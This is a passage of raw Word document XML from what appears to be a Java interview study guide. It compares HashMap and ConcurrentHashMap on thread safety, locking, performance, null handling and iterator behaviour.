    <w:p w14:paraId="16D459AD"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riterThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8107AE"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aderThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50108324" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2483C955"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Wait for the threads to finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECF7FC4"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riterThread.join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296583C1"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aderThread.join();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C5F33" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5D0A6E"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Map Size: " + map.size());  // Size after all operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7866152B"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F471272"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49B9B1E" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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 both read and write operations occur concurrently without locking the entire map, demonstrating the high concurrency capabilities of ConcurrentHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409AC9E8" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76F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0D40945D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ne-Grained Locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Different buckets or segments can be locked independently, reducing contention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0188676A" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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ck-Free Reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Read operations are lock-free, enhancing performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F406C0" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tomic Operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Supports thread-safe atomic operations like putIfAbsent(), replace(), and remove().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B3EB42" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="00DE76FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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calability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It scales well in multi-threaded environments due to its efficient locking mechanism and lock-free reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315AAD33" w14:textId="781ECC28"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F59EE7B">
          <v:rect id="_x0000_i1549" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="795AE60C" w14:textId="77777777" w:rsidR="009217B8" w:rsidRPr="00CE4B95" w:rsidRDefault="009217B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="181" w:name="_Toc196307661"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between HashMap and ConcurrentHashMap?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="181"/>
    </w:p>
    <w:p w14:paraId="5ED46E8A" w14:textId="47B63C0F" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">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hMap and ConcurrentHashMap are both part of the Java Collections Framework, but they are designed for different use cases, particularly in multithreaded environments. Here are the key differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A19D4B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0077291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A5F30B4">
          <v:rect id="_x0000_i1550" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="511C1512" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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Thread-Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6130AD" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83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p>
    <w:p w14:paraId="54952E38" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83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t thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Multiple threads accessing or modifying a HashMap concurrently can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data inconsistency</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corruption</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1AFE38" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83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It is not safe for use in concurrent environments unless externally synchronized using Collections.synchronizedMap().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7897AF6A" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83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tHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E31661F" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83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safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It is specifically designed for concurrent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7827B3C3" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83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lows multiple threads to read and write to the map concurrently without compromising data consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26282D76" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83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locking of entire map</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fine-grained lock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lock-free reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64D7D0" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0077291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0DC52F7">
          <v:rect id="_x0000_i1551" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB83F80" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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Synchronization Mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1068CB93" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="1F56711D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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oes not provide any internal synchronization. If you want to make it thread-safe, you must synchronize it externally using something like Collections.synchronizedMap().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523E2D8A" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3665F654" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fine-grained locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (segmented locks or bucket-level locks) to allow multiple threads to perform operations concurrently without locking the entire map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A7BD46" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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pports concurrent reads and writes without blocking other threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14E838" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0077291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F67A506">
          <v:rect id="_x0000_i1552" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="431D7241" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB4F89C" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83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p>
    <w:p w14:paraId="48B26013" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83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tter performance in single-threaded scenarios because it does not have to deal with the overhead of synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C85DA" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83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multi-threaded applications, performance degrades because external synchronization is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2747EAF1" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="83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tHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0CE503" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83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ptimized for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> access and provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>higher performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in multi-threaded environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BA662D" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="83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ce only the specific segment or bucket is locked, other threads can continue to access different segments concurrently, making it scalable in multi-threaded scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EEAE22" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0077291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632A21C">
          <v:rect id="_x0000_i1553" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="769B0366" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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Locking Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE50F9" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="72D5301A" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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internal locking mechanism. If you perform an operation on a HashMap concurrently, external synchronization is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A358DE" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50952D91" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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s </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>segment locking</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bucket-level locking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to allow multiple threads to work concurrently on different segments or buckets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0601E354" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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instance, operations like put(), remove(), and replace() are atomic and thread-safe, but only lock the relevant part of the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117AC437" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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ck-free reads</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: get() operations are lock-free, meaning they do not require any synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC63C63" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0077291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F81D83A">
          <v:rect id="_x0000_i1554" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2907639B" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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Null Keys/Values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B84E948" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="54F63CEE" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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llows one </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null key</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multiple null values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058C6522" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761087B0" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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Does not allow </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>null keys</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null values</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If you try to insert a null key or value, it will throw a NullPointerException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73326FEF" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0077291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350EA8F">
          <v:rect id="_x0000_i1555" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD0D8C" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291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Iterator Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD9917" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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p>
    <w:p w14:paraId="39E6CA1E" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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iterator returned by HashMap is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fail-fast</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If the map is modified (other than through the iterator itself) during iteration, a ConcurrentModificationException will be thrown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E4B4AB" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8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tHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F3E0CF" w14:textId="77777777" w:rsidR="005A02C9" w:rsidRPr="00CE4B95" w:rsidRDefault="005A02C9" w:rsidP="0077291C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8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iterator returned by ConcurrentHashMap is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fail-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
